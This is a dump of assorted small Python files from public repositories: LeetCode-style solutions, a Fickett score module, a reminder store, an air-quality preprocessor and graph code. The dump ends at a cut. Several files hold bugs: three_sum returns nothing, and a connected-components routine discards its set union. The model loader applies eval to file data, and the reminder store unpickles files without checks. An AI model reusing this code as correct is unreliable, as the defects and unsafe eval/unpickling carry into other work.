blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
1fd63ac653e827651f90ec864e2499acff8b18dd | Python | Skrilltrax/DS | /grokking-python/two_pointer/three_sum.py | UTF-8 | 1,033 | 3.515625 | 4 | [] | no_license | from typing import List
def three_sum(self, nums: List[int]) -> List[List[int]]:
    """Return all unique triplets in nums that sum to zero.

    Sorts nums in place, then fixes each element in turn and delegates
    the two-pointer pair search to find_triplets_for_fixed.
    """
    length: int = len(nums)
    triplets: List[List[int]] = []
    # sort the array so the two-pointer scan and duplicate skipping work
    nums.sort()
    for i in range(length):
        # skip duplicate fixed elements to avoid emitting repeated triplets
        if i > 0 and nums[i] == nums[i - 1]:
            continue
        find_triplets_for_fixed(-nums[i], nums, i + 1, triplets)
    # BUG FIX: the original collected results but never returned them
    return triplets
def find_triplets_for_fixed(target, nums, left, triplets):
    """Two-pointer search for pairs in sorted nums[left:] summing to target.

    target is -nums[i] for the fixed element, so each match yields the
    zero-sum triplet [-target, nums[left], nums[right]].  Matches are
    appended to the shared `triplets` list; duplicate pairs are skipped.
    """
    right: int = len(nums) - 1
    while left < right:
        current_sum: int = nums[left] + nums[right]
        if current_sum == target:
            # BUG FIX: append the triplet as ONE list instead of three
            # separate scalars, so the result really is List[List[int]].
            triplets.append([-target, nums[left], nums[right]])
            left += 1
            right -= 1
            # skip duplicate values on both sides of the window
            while left < right and nums[left] == nums[left - 1]:
                left += 1
            while left < right and nums[right] == nums[right + 1]:
                right -= 1
        elif current_sum < target:
            left += 1
        else:
            right -= 1
| true |
4449cb49e7785146f2b0f42d1f85ffa36e6760dc | Python | Hermes777/sparse_class_rbm | /ClassRBMPy/loading_model.py | UTF-8 | 1,674 | 2.6875 | 3 | [] | no_license | import os
import pdb
import rbm
import numpy
def matrix_load(path):
    """Load a tab-separated matrix file and return it as a numpy array.

    The first line holds "<rows>\t<cols>"; each following line holds one
    row of tab-separated numeric values.  Exits the process if a row does
    not have the declared number of columns.
    """
    # Context manager closes the file even on error (the original leaked it).
    with open(path, 'r') as fobj:
        header = fobj.readline().strip()
        row = int(header.split("\t")[0])
        col = int(header.split("\t")[1])
        matrix = []
        for i in range(0, row):
            line = fobj.readline().strip()
            tmp = line.split('\t')
            if len(tmp) != col:
                # print() works on both Python 2 and 3 (the original used
                # a Python 2 print statement).
                print("Invalid File, file col:%d define col:%d" % (len(tmp), col))
                exit(-1)
            for j in range(0, col):
                # float() replaces eval(): same numeric result for model
                # files without executing arbitrary file content.
                tmp[j] = float(tmp[j])
            matrix.append(tmp)
    return numpy.array(matrix)
def matrix_save(path, matrix):
    """Write a matrix to `path` in the format read back by matrix_load.

    First line: "<rows>\t<cols>"; then one tab-separated line per row
    (the trailing tab per row is stripped again by matrix_load).
    """
    rows = numpy.size(matrix, 0)
    cols = numpy.size(matrix, 1)
    # Context manager guarantees the file is flushed/closed even on error.
    with open(path, 'w') as wobj:
        wobj.write(str(rows) + "\t" + str(cols) + "\n")
        for i in range(0, rows):
            for j in range(0, cols):
                wobj.write(str(matrix[i][j]) + "\t")
            wobj.write('\n')
def loading_model(path):
    """Rebuild an rbm.Model whose parameter matrices were saved under `path`."""
    model = rbm.Model()
    # Each parameter lives in its own "<name>.txt" matrix file.
    for name in ('W', 'b', 'c', 'Wc', 'cc', 'labels'):
        setattr(model, name, matrix_load(path + '/' + name + '.txt'))
    return model
def save_model(path, model):
    """Persist every parameter matrix of `model` into directory `path`."""
    if not os.path.exists(path):
        os.mkdir(path)
    # Mirror of loading_model: one "<name>.txt" file per parameter.
    for name in ('W', 'b', 'c', 'Wc', 'cc', 'labels'):
        matrix_save(path + '/' + name + '.txt', getattr(model, name))
# Smoke test: load a previously saved model from the sample directory.
if __name__ == '__main__':
    model = loading_model('./model/test_model/')
| true |
e2932240f611b70d20b0c549717eba4d3109352b | Python | Twangist/prelogging | /examples/use_library.py | UTF-8 | 2,493 | 2.796875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
__author__ = 'brianoneill'
import library
import logging
try:
    # BUG FIX: import the name actually used below.  The original did a
    # bare `import prelogging`, which left LCDict undefined whenever the
    # package was installed (the fallback branch never ran).
    from prelogging import LCDict
except ImportError:
    import sys
    sys.path[0:0] = ['..']  # , '../..'
    from prelogging import LCDict
def logging_config():
    """Configure root logging via prelogging: one stdout handler at DEBUG,
    attached to the root logger so propagated `library` records are shown."""
    d = LCDict(attach_handlers_to_root=True) # LCDict default: =False
    d.add_stdout_handler('stdout', formatter='logger_level_msg', level='DEBUG')
    # NOTE: root level is WARNING (default),
    # . 'library' logger level is INFO.
    # . Messages of 'library' propagate,
    # . and those of levels INFO and up *are logged*.
    d.config()
def main():
    """Exercise the `library` package with and without logging configured.

    The big string below records the expected console output for each of
    the four combinations of the two lines flagged in the Exercise note.
    """
    # Exercise:
    # Comment out and uncomment the following two lines, individually
    # (4 cases); observe the console output in each case.
    logging_config()
    logging.getLogger().warning("I must caution you about that.")
    library.do_package_thing()
    library.do_something()
    library.do_something_else()
    # Results:
    """
    (1)
    logging_config()
    logging.getLogger().warning("I must caution you about that.")
    writes to stdout:
    root : WARNING : I must caution you about that.
    library : INFO : INFO msg from package logger
    Did package thing.
    library.module : INFO : INFO msg
    Did something.
    library.module.other: WARNING : WARNING msg
    Did something else.
    (2)
    # logging_config()
    logging.getLogger().warning("I must caution you about that.")
    writes (to stdout)
    Did package thing.
    Did something.
    Did something else.
    and (to stderr)
    I must caution you about that.
    (possibly between or after the lines written to stdout).
    (3)
    logging_config()
    # logging.getLogger().warning("I must caution you about that.")
    writes to stdout:
    library : INFO : INFO msg from package logger
    Did package thing.
    library.module : INFO : INFO msg
    Did something.
    library.module.other: WARNING : WARNING msg
    Did something else.
    (4)
    # logging_config()
    # logging.getLogger().warning("I must caution you about that.")
    writes to stdout
    Did package thing.
    Did something.
    Did something else.
    """
# Script entry point.
if __name__ == '__main__':
    main()
| true |
db8c0ee56196a5d3de5f1aa70a30ab9c1afad660 | Python | qq851185223/IDDLncLoc | /lncloc/feature_extracting/CTD/feamodule/fickett.py | UTF-8 | 3,862 | 3.046875 | 3 | [] | no_license | #!/usr/bin/env python
'''the python script is downloaded from https://sourceforge.net/projects/rna-cpat/files/v1.2.2/'''
'''calculate coding potential'''
# Fickett TESTCODE data
# NAR 10(17) 5303-531
# Per-base positional probability rows, one value per threshold bucket in
# position_para (descending thresholds), from Fickett's TESTCODE tables.
position_prob = {
    'A': [0.94, 0.68, 0.84, 0.93, 0.58, 0.68, 0.45, 0.34, 0.20, 0.22],
    'C': [0.80, 0.70, 0.70, 0.81, 0.66, 0.48, 0.51, 0.33, 0.30, 0.23],
    'G': [0.90, 0.88, 0.74, 0.64, 0.53, 0.48, 0.27, 0.16, 0.08, 0.08],
    'T': [0.97, 0.97, 0.91, 0.68, 0.69, 0.44, 0.54, 0.20, 0.09, 0.09]
}
# weight of the positional score per base in the combined TESTCODE value
position_weight = {'A': 0.26, 'C': 0.18, 'G': 0.31, 'T': 0.33}
# descending thresholds matched against the per-base position ratio
position_para = [1.9, 1.8, 1.7, 1.6, 1.5, 1.4, 1.3, 1.2, 1.1, 0.0]
# Per-base content probability rows, paired with content_para thresholds.
content_prob = {
    'A': [0.28, 0.49, 0.44, 0.55, 0.62, 0.49, 0.67, 0.65, 0.81, 0.21],
    'C': [0.82, 0.64, 0.51, 0.64, 0.59, 0.59, 0.43, 0.44, 0.39, 0.31],
    'G': [0.40, 0.54, 0.47, 0.64, 0.64, 0.73, 0.41, 0.41, 0.33, 0.29],
    'T': [0.28, 0.24, 0.39, 0.40, 0.55, 0.75, 0.56, 0.69, 0.51, 0.58]
}
# weight of the content score per base in the combined TESTCODE value
content_weight = {'A': 0.11, 'C': 0.12, 'G': 0.15, 'T': 0.14}
# descending thresholds matched against the per-base content fraction
content_para = [0.33, 0.31, 0.29, 0.27, 0.25, 0.23, 0.21, 0.17, 0]
def look_up_position_prob(value, base):
    '''look up positional probability by base and value'''
    score = float(value)
    if score < 0:
        return None
    # thresholds are descending; return the first bucket the score reaches
    for threshold, probability in zip(position_para, position_prob[base]):
        if score >= threshold:
            return float(probability) * float(position_weight[base])
def look_up_content_prob(value, base):
    '''look up content probability by base and value'''
    score = float(value)
    if score < 0:
        return None
    # thresholds are descending; return the first bucket the score reaches
    for threshold, probability in zip(content_para, content_prob[base]):
        if score >= threshold:
            return float(probability) * float(content_weight[base])
def fickett_value(dna):
    '''Calculate the Fickett TESTCODE value of a DNA sequence.

    Combines per-base content scores (overall base frequency) and position
    scores (asymmetry of the base across the three codon phases), each
    mapped through the published lookup tables.  Returns 0 for sequences
    shorter than 2 bases.
    '''
    if len(dna) < 2:
        return 0
    fickett_score = 0
    dna = dna.upper()
    total_base = len(dna)
    # Content scores first, then position scores, in A, C, G, T order --
    # the same float-addition order as the original unrolled code.
    for base in 'ACGT':
        content = float(dna.count(base)) / total_base
        fickett_score += look_up_content_prob(content, base)
    for base in 'ACGT':
        # dna[phase::3] is the subsequence of codon phase 0, 1 or 2
        phase_counts = [dna[phase::3].count(base) for phase in range(3)]
        position = max(phase_counts) / (min(phase_counts) + 1.0)
        fickett_score += look_up_position_prob(position, base)
    return fickett_score
| true |
a8b60a0f27843a84dcd5a3d54c6033a4e38dc8fe | Python | tradermichael/Python_Based | /project-2c-tradermichael/change.py | UTF-8 | 388 | 3.625 | 4 | [] | no_license | cents = int(input("Please enter an amount in cents less than a dollar.\n"))
# Greedy coin change: take as many of each coin as possible, largest
# denomination first.  divmod yields count and remainder in one step
# (the original also had a dead `leftover = cents` assignment).
quarters, leftover = divmod(cents, 25)
dimes, leftover = divmod(leftover, 10)
nickels, pennies = divmod(leftover, 5)
print("Your change will be:")
print("Q: " + str(quarters))
print("D: " + str(dimes))
print("N: " + str(nickels))
print("P: " + str(pennies))
| true |
afea459e0ba5590c1bc49daa582c10fcdb6a9b18 | Python | erjan/coding_exercises | /bold_words_in_string.py | UTF-8 | 1,092 | 3.484375 | 3 | [
"Apache-2.0"
] | permissive | '''
Given an array of keywords words and a string s, make all appearances of all keywords words[i] in s bold. Any letters between <b> and </b> tags become bold.
Return s after adding the bold tags. The returned string should use the least number of tags possible, and the tags should form a valid combination.
'''
class Solution:
    def boldWords(self, words: List[str], S: str) -> str:
        """Wrap every character of S covered by any keyword occurrence in
        <b>...</b>, merging overlapping and adjacent bold runs."""
        n = len(S)
        mask = [False] * n
        # Mark every character covered by any occurrence of any keyword.
        for word in words:
            pos = S.find(word)
            while pos != -1:
                for j in range(pos, pos + len(word)):
                    mask[j] = True
                pos = S.find(word, pos + 1)
        # Emit tags at the boundaries of each maximal bold run.
        pieces = []
        for i, ch in enumerate(S):
            if mask[i] and (i == 0 or not mask[i - 1]):
                pieces.append('<b>')
            pieces.append(ch)
            if mask[i] and (i == n - 1 or not mask[i + 1]):
                pieces.append('</b>')
        return "".join(pieces)
| true |
a15ac89f6e744bea7bea79c3e165325239d3e15b | Python | Molo-M/Polygon-Area-Calculator | /Polygon Area Calculator.py | UTF-8 | 2,113 | 3.703125 | 4 | [] | no_license | class Rectangle:
    def __init__(self, width, height):
        """Create a rectangle with the given width and height."""
        self.width = width
        self.height = height
        # cached result of the most recent get_area() call (0 until computed)
        self.area = 0
    def set_width(self, width):
        """Replace the rectangle's width."""
        self.width = width
    def set_height(self, height):
        """Replace the rectangle's height."""
        self.height = height
def get_area(self):
self.area = self.width * self.height
return self.area
def get_perimeter(self):
perimeter = (2 * self.height) + (2 * self.width)
return perimeter
def get_diagonal(self):
diagonal = ((self.width ** 2 + self.height ** 2) ** .5)
return diagonal
def get_picture(self):
if self.width > 50 or self.height > 50:
return 'Too big for picture.'
else:
img = ''
width = '*' * self.width
img += width
for i in range(self.height - 1):
img += '\n' + width
img += '\n'
return img
def get_amount_inside(self, shape):
self.get_area()
shape.get_area()
if self.area < shape.area or self.width < shape.width or self.height < shape.height:
return 0
else:
fit = int(self.area/shape.area)
return fit
def __str__(self):
height = str(self.height)
width = str(self.width)
show = f'Rectangle(width={width}, height={height})'
return show
class Square(Rectangle):
    """A Rectangle whose width and height are always the same length."""

    def __init__(self, side):
        super().__init__(width=side, height=side)
        self.side = side

    def set_side(self, side):
        """Set both dimensions (and side) to the given length."""
        super().set_width(width=side)
        super().set_height(height=side)
        self.side = side

    def set_width(self, width):
        """Changing the width of a square also updates its side."""
        super().set_width(width=width)
        self.side = width

    def set_height(self, height):
        """Changing the height of a square also updates its side.

        BUG FIX: the original called super().set_height(width=height),
        which raised TypeError (Rectangle.set_height has no 'width'
        parameter), and left self.side stale (the update was commented
        out), unlike the symmetric set_width above.
        """
        super().set_height(height=height)
        self.side = height

    def __str__(self):
        """Return e.g. 'Square(side=2)'."""
        return f'Square(side={self.side})'
# Demo / manual smoke test of the two shape classes.
rect = Rectangle(10, 5)
sq = Square(9)
rect.set_width(7)
rect.set_height(8)
sq.set_side(2)
print(sq.get_picture())
print('------')
# expected picture of the 2x2 square, for visual comparison
f = "**\n**\n"
print(f)
print('-------')
| true |
41a66a3f39416f186426126c00ba816d8ab6202b | Python | adeak/AoC2018 | /day09.py | UTF-8 | 1,073 | 3.484375 | 3 | [] | no_license | from itertools import cycle
from collections import deque
class Marbles(deque):
    """Circular ring of marbles; index 0 is always the current marble."""

    def moveclock(self, n=1):
        # negative rotation brings the marble n steps clockwise to index 0
        self.rotate(-n)

    def movecounter(self, n=1):
        # positive rotation moves n steps counter-clockwise
        self.rotate(n)

    def insertright(self, val):
        """Insert val one position clockwise of the current marble and
        make it the new current marble."""
        self.moveclock()
        self.appendleft(val)

    def remove(self):
        # NOTE(review): shadows deque.remove(value) with a zero-argument
        # variant that discards the current (leftmost) marble.
        self.popleft()
def day09(inp, factor=1):
    """Play the AoC 2018 day 9 marble game and return the winning score.

    `inp` looks like '<players> players; last marble is worth <N> points';
    `factor` multiplies the last marble number (part 2 of the puzzle).
    """
    tokens = inp.split()
    player_count = int(tokens[0])
    last_marble = int(tokens[-2]) * factor
    circle = Marbles([0])
    scores = [0] * player_count
    turns = cycle(range(player_count))
    for marble in range(1, last_marble + 1):
        elf = next(turns)
        if marble % 23 == 0:
            # scoring marble: the elf keeps it plus the marble seven
            # positions counter-clockwise, which is removed from the ring
            circle.movecounter(7)
            scores[elf] += marble + circle[0]
            circle.remove()
        else:
            circle.moveclock()
            circle.insertright(marble)
    return max(scores)
if __name__ == "__main__":
    # Run the sample input first, then the real input; factor=100 is part 2.
    testinp = open('day09.testinp').read().strip()
    inp = open('day09.inp').read().strip()
    print(day09(testinp))
    print(day09(inp))
    print(day09(testinp, factor=100))
    print(day09(inp, factor=100))
| true |
3092a3d2c738c60acb8193d4ab4ccf8b82278a63 | Python | Rudya93/Python1 | /10.py | UTF-8 | 690 | 3.203125 | 3 | [] | no_license | # a = list()
# c =[]
a = input("Please input string: ")
# for i in (len(a)):
# b = input()
# b = (int(b))
# c.append(b)
b = a.count('a')
c = a.count('b')
d = a.count('c')
e = a.count('d')
f = a.count('e')
g = a.count('f')
l = a.count('g')
h = a.count('h')
m = a.count('l')
n = a.count('m')
o = a.count('n')
p = a.count('o')
q = a.count('p')
r = a.count('q')
s = a.count('r')
t = a.count('s')
w = a.count('t')
print('a' * b + 'b' * c + 'c' * d + 'd' * e + 'e' * f + 'f' * g + 'g' * l + 'l' * h)
#print (b)
# print('Abracadabra'.count('a'))
# # вернёт 4
# print(('a' * 10).count('aa'))
# # вернёт
#сколько вернет пмоножить и вывести | true |
f47bf4a9c0302bb8638ced921e6006a4241d2226 | Python | ttppggnnss/CodingNote | /2004/0410/boj 2661-2.py | UTF-8 | 482 | 2.796875 | 3 | [] | no_license | import sys
sys.stdin=open('../input.txt','r')
L=['1','2','3']
def f(n,c='',k=0):
global p
if p:
return
if k==n:
p=c
print(p)
return
else:
for i in L:
d=c+i
if g(d):
f(n,d,k+1)
else:
continue
def g(d):
k=len(d)
m=(k+1)//2
for i in range(2,m+2):
if d[-1:-i:-1]==d[-i:-i-i+1:-1]:
return False
return True
p=0
f(int(input())) | true |
bfa629bcaf747f22f6d301080912d8ffae1ecc22 | Python | bsammor/machine-learning | /preprocess.py | UTF-8 | 7,256 | 3.234375 | 3 | [] | no_license | #-------------------------------------------------------------------------------
# This code is to preprocess the dataset from the below link:
# https://archive.ics.uci.edu/ml/datasets/Beijing+Multi-Site+Air-Quality+Data
#
# Before running this code, keep the downloaded dataset in a zip file
# in the same directory as this code. Name the zip file Data.zip
#
# Input: (look for this in global variables) 'path' variable
# Output: [X, Y] values which are preprocessed for training
#
# Date: 07 Mar 2020
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# IMPORTS
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import glob
import os
#-------------------------------------------------------------------------------
# GLOBAL VARIABLES
#path to the unziped dataset directory
path = '/home/saarika/Desktop/ML/PRSA_Data_20130301-20170228/'
try:
    print("\treading from path: ", path, "\t")
    all_files = glob.glob(os.path.join(path, "*.csv"))
except OSError:
    # Narrowed from a bare `except:`; also bind all_files so later code
    # sees an empty list instead of raising NameError.
    all_files = []
    print("\nNo path specified. Please specify path in preprocess.py\n")
#-------------------------------------------------------------------------------
# FUNCTIONS
# Function to intialize an empty dictionary to a dictionary with the
# skeleton of the dataframe
# takes in a dataframe
# returns a dictionary with the skeleton of the dataframe
def initialize_dict(df):
    """Return {column_name: []} for every column of the dataframe."""
    return {column: [] for column in df.columns}
# Function to create 1 row for the particular date
# input: dictionary(with the skeleton of the df/can have some values ), the dataframe, the date
# returns a dictionary appended with that date's mean data
def MeanofThatDay(init_dict, df3000, date):
    """Append one aggregated row for `date` to init_dict and return it.

    Numeric columns get their daily mean; object (string) columns get the
    first value observed that day.
    """
    day_rows = df3000.loc[df3000.Date == date]
    for column in df3000.columns:
        # dtype 'O' (object) marks string columns, which cannot be averaged
        if np.dtype(df3000[column]) != np.dtype('O'):
            init_dict[column].append(day_rows[column].mean())
        else:
            init_dict[column].append(day_rows[column].tolist()[0])
    return init_dict
#Function to Group Wind Direction into 4 groups: NW, NE, SW, SE
#Input: DataFrame with Wind Direction
#Output: DataFrame with grouped wind dir
def GroupWindDir(df):
    """Collapse 16-point wind directions into the 4 quadrants NW/NE/SE/SW,
    in place.

    BUG FIX: the original dict literal was missing a comma after
    'W': 'NW', so the adjacent string literals concatenated and the
    module failed to parse (SyntaxError).
    """
    df.replace({
        'wd': {
            'N': 'NW', 'WNW': 'NW', 'NNW': 'NW', 'W': 'NW',  # group NW
            'NNE': 'NE', 'ENE': 'NE',                        # group NE
            'E': 'SE', 'ESE': 'SE', 'SSE': 'SE', 'S': 'SE',  # group SE
            'SSW': 'SW', 'WSW': 'SW'                         # group SW
        }
    }, inplace=True)
# Function to Group Wind Direction into 4 numerical groups: 1, 2, 3, 4
# Input: DataFrame with Wind Direction
# Output: DataFrame with numerically grouped wind dir
def GroupWindDir_Numbers(df):
    """Encode the 4 wind-direction groups as integers 1..4, in place."""
    codes = {'NW': 1, 'NE': 2, 'SE': 3, 'SW': 4}
    df.replace({'wd': codes}, inplace=True)
# Function to Group Stations into 12 numerical groups: 1, 2,.., 12
# Input: DataFrame with station
# Output: DataFrame with numerically named station
def GroupStation_Numbers(df):
    """Encode the 12 monitoring stations as integers 1..12, in place."""
    stations = ['Huairou', 'Aotizhongxin', 'Wanliu', 'Tiantan', 'Changping',
                'Gucheng', 'Dongsi', 'Wanshouxigong', 'Guanyuan',
                'Nongzhanguan', 'Dingling', 'Shunyi']
    codes = {name: number for number, name in enumerate(stations, start=1)}
    df.replace({'station': codes}, inplace=True)
# Function to perform mean normalization and feature scaling
# takes in a dataframe.Series
# returns a df.Series scaled and mean normalized
def scale(column):
    """Mean-normalize and feature-scale a Series: (x - mean) / std."""
    return (column - column.mean()) / column.std()
#-------------------------------------------------------------------------------
# MAIN
def main():
    """Full preprocessing pipeline for the Beijing air-quality dataset.

    Loads every station CSV, aggregates hourly rows into daily means,
    numerically encodes wind direction and station, scales the remaining
    numeric features, and returns [X, Y] where Y is the PM2.5 target.
    """
    print("\nSTARTING PREPROCESSING\n")
    # Run this for all stations
    df_from_each_file = (pd.read_csv(f) for f in all_files)
    df = pd.concat(df_from_each_file, ignore_index=True)
    # For station values one by one
    # Change index of 0 for all_files below
    # f = all_files[0]
    # df = pd.read_csv(f)
    print("\tdropping NaN values of dataframe..\n")
    df.dropna(inplace=True)
    print("\tresetting index of dataframe..\n")
    df.reset_index(inplace=True)
    print("\tcreating 'Date' in dataframe..\n")
    df['Date'] = df.year.astype(str) + '/' + df.month.astype(str) + '/' + df.day.astype(str)
    # drop the raw date parts, the row id, and the pollutants we do not model
    df.drop('year', axis=1, inplace=True)
    df.drop('month', axis=1, inplace=True)
    df.drop('day', axis=1, inplace=True)
    df.drop('hour', axis=1, inplace=True)
    df.drop('No', axis=1, inplace=True)
    df.drop('SO2', axis=1, inplace=True)
    df.drop('NO2', axis=1, inplace=True)
    df.drop('CO', axis=1, inplace=True)
    df.drop('O3', axis=1, inplace=True)
    df.drop('PM10', axis=1, inplace=True)
    print("\ttaking daily averages..\t (This will take some time to run for each station)")
    # Final dataframe that with desired data
    df_final = pd.DataFrame(initialize_dict(df))  # just creating an empty one
    for station in df.station.unique():  # the 12 station names, one by one
        dfstation = df.loc[df.station == station]  # rows of this station
        # Mean of the day
        init_dict = initialize_dict(dfstation)
        for date in dfstation.Date.unique():
            init_dict = MeanofThatDay(init_dict, dfstation, date)
        df_final = df_final.append(pd.DataFrame(init_dict), ignore_index=True)
        print('done with ', station)
    print("\n\tgiving nos to wind direction..\n")
    # Grouping of wind directions
    GroupWindDir(df_final)
    GroupWindDir_Numbers(df_final)
    print("\tgiving nos to stations..\n")
    # Grouping of stations
    GroupStation_Numbers(df_final)
    print("\tSending unscaled data into a csv file for future reference..\n")
    # Writing into a csv file for reference
    df_final.to_csv('preproc.csv', index=False)
    print("\tScaling data..\n")
    # Y values from our final set
    Y = np.array(df_final['PM2.5'])
    # Extract the wind direction and stations
    X_wd = np.array([df_final.wd])
    X_station = np.array([df_final.station])
    # BUG FIX: these columns must be dropped from df_final (the frame that
    # is scaled below); the original dropped them from df, so df_final
    # still carried PM2.5/wd/Date/station into the scaling loop.
    df_final.drop(columns=['PM2.5', 'wd', 'Date', 'station'], inplace=True)
    # Scale dataframe
    for col in df_final.columns:
        df_final[col] = scale(df_final[col])
    X_temp = np.array(df_final)
    # Regroup the X_wd and X_station with X_temp to get the final X set of features
    X = np.append(X_temp, np.transpose(X_wd), axis=1)
    X = np.append(X, np.transpose(X_station), axis=1)
    print("\nPREPROCESSING FINISHED SUCCESSFULLY\n")
    return [X, Y]
# Running as a script executes the whole pipeline (the [X, Y] result is
# discarded; import the module and call main() to use it).
if __name__ == '__main__':
    main()
| true |
f6d59a9d7bdef00ee744d5792e07163bbbd9b234 | Python | butteredcorn/agile-assignment-1 | /database.py | UTF-8 | 6,186 | 3.015625 | 3 | [] | no_license | import pickle
import importlib
import itertools
from operator import itemgetter
reminders = importlib.import_module('reminders')
# Named constants so the list/ID arithmetic in Store reads intentionally.
constant = {
    'empty_string': 0,
    'first_id': 0,
    'offset': 1,
    'none': 0,
    'increment': 1
}
# print(constant['empty_string'])
# print(constant['first_id'])
# print(constant['offset'])
"""
Class for storing, searching, and importing/exporting reminders
Depends on: reminders.py
"""
class Store:
    """In-memory store of reminder objects with tag/text search and pickle
    import/export, including ID-conflict resolution on import."""

    def __init__(self):
        # reminder objects stored in a list, in insertion order
        self.__reminders = []

    @property
    def reminders(self):
        """Return display strings, one per stored reminder."""
        dict_cache = []
        for reminder in self.__reminders:
            dict_cache.append(f"Reminder ID: {reminder.id} | Tags: {reminder.tags}\nDescription: {reminder.text}\n")
        return dict_cache

    def addReminder(self, reminder):
        """Append a reminder object to the store."""
        self.__reminders.append(reminder)

    def search(self, tag=None, text=None, both=None):
        """Return reminders matching a tag, a text substring, or either.

        Exactly one of the three parameters is expected; `both` carries a
        term matched against text AND tags.  Raises ValueError when all
        parameters are None or any is an empty string.
        """
        if tag is None and text is None and both is None:
            raise ValueError("Non-Permissible Search Parameters: Not all three fields can be None.")
        elif tag == "" or text == "" or both == "":
            raise ValueError("Non-Permissible Search Parameters: Search parameter cannot be empty string.")
        elif tag is not None and tag.lower() == "none":
            # BUG FIX: guard tag before calling .lower() -- the original
            # crashed with AttributeError on text-only or both-only searches.
            print("\nPlease be advised that reminders without tags cannot be searched by typing 'none'.")
        elif tag:
            searchCache = []
            for reminder in self.__reminders:
                if reminder.tags is None:
                    continue
                for eachTag in reminder.tags:
                    if eachTag == tag:
                        searchCache.append(reminder)
            return searchCache  # whole reminder objects; the engine can parse
        elif text:
            searchCache = []
            for reminder in self.__reminders:
                if text in reminder.text:
                    searchCache.append(reminder)
            return searchCache
        elif both:
            # `both` is the search term; choosing this mode is handled by
            # the ReminderEngine.
            searchCache = []
            for reminder in self.__reminders:
                if both in reminder.text:
                    searchCache.append(reminder)
                elif reminder.tags is None:
                    continue
                else:
                    for eachTag in reminder.tags:
                        # BUG FIX: compare tags against `both` (the original
                        # compared against `tag`, which is None in this mode).
                        if eachTag == both:
                            searchCache.append(reminder)
            return searchCache

    def searchByID(self, reminderID):
        """Return the reminder whose id matches, or None if absent/invalid."""
        # BUG FIX: the original called int(reminderID) inside the condition,
        # so non-numeric input raised ValueError before the error message,
        # and the legitimate ID 0 was rejected as falsy.
        try:
            target = int(reminderID)
        except (TypeError, ValueError):
            return print("Error: Please enter an integer only.")
        for reminder in self.__reminders:
            if reminder.id == target:
                return reminder

    def exportToPickle(self, fileName):
        """Pickle the whole reminder list to <fileName>.pickle."""
        if fileName == "":
            raise ValueError("Filename cannot be of type empty string.")
        if self.__reminders == []:
            return print("\nNothing to export.")
        # context manager closes the file even on error (original leaked it)
        with open(f"{fileName}.pickle", "wb") as pickle_out:  # wb = writable
            pickle.dump(list(self.__reminders), pickle_out)
        print(f"\nReminders have been exported to {fileName}.pickle.")

    def importFromPickle(self, fileName):
        """Load <fileName>.pickle and merge it into the local reminders.

        Exact duplicates (same id, text, tags) are dropped; reminders with
        a conflicting id but different content get a fresh id.  The merged
        list is sorted by id and the reminders module's auto-increment ID
        generator is resynchronised.
        """
        # context manager closes the file even on error (original leaked it)
        with open(f"{fileName}.pickle", "rb") as pickle_in:  # rb = readable
            importedReminders = pickle.load(pickle_in)
        if self.__reminders == []:
            currentHighestLocalID = constant['first_id']
        else:
            currentHighestLocalID = int((self.__reminders[-1]).id)
        nextID = currentHighestLocalID + constant['offset']
        setCache = []
        if len(self.__reminders) != constant['empty_string']:
            for localReminder in self.__reminders:
                setCache.append(localReminder)
        if len(setCache) != constant['empty_string']:
            for importedReminder in importedReminders:
                # NOTE(review): appending to setCache while iterating it is
                # intentional here (newly appended reminders are rescanned),
                # preserved from the original merge logic.
                for localReminder in setCache:
                    if importedReminder.id == localReminder.id:
                        if importedReminder.text == localReminder.text and importedReminder.tags == localReminder.tags:
                            # exact duplicate identified
                            continue
                        else:
                            # conflicting ids, but different reminders
                            localReminder.id = nextID
                            setCache.append(importedReminder)
                            nextID = nextID + constant['offset']
        else:
            for importedReminder in importedReminders:
                setCache.append(importedReminder)
                nextID = nextID + constant['offset']
        nextID = nextID - constant['offset']
        # sort order of reminders after merge (reaches into the reminder's
        # protected _id attribute, as the original did)
        setCache.sort(key=lambda x: x._id)
        self.__reminders = setCache
        # sync up the auto-incrementing ID generator in reminders
        reminders.resource_cl.setGenerator(nextID)
| true |
d56cdf365e00f1c2cd94d996fd155f22f6a94476 | Python | itomi/algorithms | /graphs/connected_components/connected.py | UTF-8 | 1,334 | 3.140625 | 3 | [] | no_license | import sys
class Graph:
    """Edge-list graph; the 'undirected' property records that reverse
    edges were added at parse time."""

    def __init__(self):
        self.nodes = set()
        self.edges = set()
        self.properties = []

    def __repr__(self):
        return f"nodes: {self.nodes!r}\nedges: {self.edges!r}\n{self.properties!r}"
def connected_components_set(graph):
    """Return the connected components of `graph` as a set of sorted tuples.

    BUG FIXES: the original (a) called marked.union(...) and discarded the
    result, so `marked` never grew and every node was re-expanded, and
    (b) expanded a component with a single pass over the edges, missing
    chains whose edges appear in an unfavourable order.  The helper now
    follows edges to a fixpoint, and components are emitted as sorted
    tuples so equal components always deduplicate in the result set.
    """
    collections = set()
    marked = set()

    def connected_component(graph, node):
        # breadth/depth-agnostic flood fill along outgoing edges
        collection = {node}
        frontier = [node]
        while frontier:
            current = frontier.pop()
            for a, b in graph.edges:
                if a == current and b not in collection:
                    collection.add(b)
                    frontier.append(b)
        return collection

    for node in graph.nodes:
        if node in marked:
            continue
        component = connected_component(graph, node)
        collections.add(tuple(sorted(component)))
        marked.update(component)
    return collections
def parse_file_set(filename):
    """Parse an edge-list file into a Graph and return it.

    Each line is "a b"; a line reading "undirected" marks the graph
    undirected, in which case reverse edges are added after parsing.
    """
    graph = Graph()
    # context manager closes the handle (the original leaked it)
    with open(filename) as file:
        for line in file:
            line = line.strip()
            if line in ["undirected"]:
                graph.properties.append("undirected")
                continue
            a, b = line.split()
            graph.nodes = graph.nodes.union([a, b])
            graph.edges.add((a, b))
    if "undirected" in graph.properties:
        closure = set()
        for a, b in graph.edges:
            closure.add((b, a))
        graph.edges = graph.edges.union(closure)
    # print() form works on both Python 2 and 3 (original used a Python 2
    # print statement, which is a SyntaxError under Python 3)
    print(graph)
    return graph
def main(args):
    """Entry point: parse the edge-list file named in args[0] and print
    its connected components."""
